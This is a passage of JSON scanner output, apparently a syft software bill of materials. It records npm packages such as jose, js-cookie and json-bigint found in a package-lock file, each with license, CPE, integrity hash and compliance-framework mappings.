"techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b4f550816fd1d6a8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: isexe 2.0.0", "title": "isexe 2.0.0", "description": "Package discovered: isexe 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "18556628c2ed871d", "name": "isexe", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/isexe@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "399923db78bd2f5d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jackspeak 3.4.3", "title": "jackspeak 3.4.3", "description": "Package discovered: jackspeak 3.4.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "668b76a592331d7f", "name": "jackspeak", "version": "3.4.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BlueOak-1.0.0", "spdxExpression": "BlueOak-1.0.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jackspeak@3.4.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", "dependencies": { "@isaacs/cliui": "^8.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c7be600d2bcad0a1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jay-peg 1.1.1", "title": "jay-peg 1.1.1", "description": "Package discovered: jay-peg 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c5304af01a3223ed", "name": "jay-peg", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jay-peg@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz", "integrity": "sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww==", "dependencies": { "restructure": "^3.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5b403253da2d4e5e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jiti 1.21.7", "title": "jiti 1.21.7", "description": "Package discovered: jiti 1.21.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a3b57ee8874ce4dc", "name": "jiti", "version": "1.21.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jiti@1.21.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz", "integrity": "sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "feda20014c18c42e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jose 4.15.9", "title": "jose 4.15.9", "description": "Package discovered: jose 4.15.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0246497cf4065c27", "name": "jose", "version": "4.15.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/jose@4.15.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.9.tgz", "integrity": "sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ad953d39f31a884d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: js-beautify 1.15.4", "title": "js-beautify 1.15.4", "description": "Package discovered: js-beautify 1.15.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "eb8b761fb0d3a989", "name": "js-beautify", "version": "1.15.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/js-beautify@1.15.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz", "integrity": "sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA==", "dependencies": { "config-chain": "^1.1.13", "editorconfig": "^1.0.4", "glob": "^10.4.2", "js-cookie": "^3.0.5", "nopt": "^7.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cb31e7fb1004281e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: js-cookie 3.0.5", "title": "js-cookie 3.0.5", "description": "Package discovered: js-cookie 3.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "07274f4b8a4d661e", "name": "js-cookie", "version": "3.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/js-cookie@3.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz", "integrity": "sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4db17fad932f2d8e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: js-md5 0.8.3", "title": "js-md5 0.8.3", "description": "Package discovered: js-md5 0.8.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d30adc61a99cb3ed", "name": "js-md5", "version": "0.8.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/js-md5@0.8.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz", "integrity": "sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "88f0214bae1b08f0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: js-tokens 4.0.0", "title": "js-tokens 4.0.0", "description": "Package discovered: js-tokens 4.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "132a500346fcea0c", "name": "js-tokens", "version": "4.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/js-tokens@4.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d7056e806f2cd1e3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: json-bigint 1.0.0", "title": "json-bigint 1.0.0", "description": "Package discovered: json-bigint 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f29c1976ad3d8cb0", "name": "json-bigint", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:*", "source": 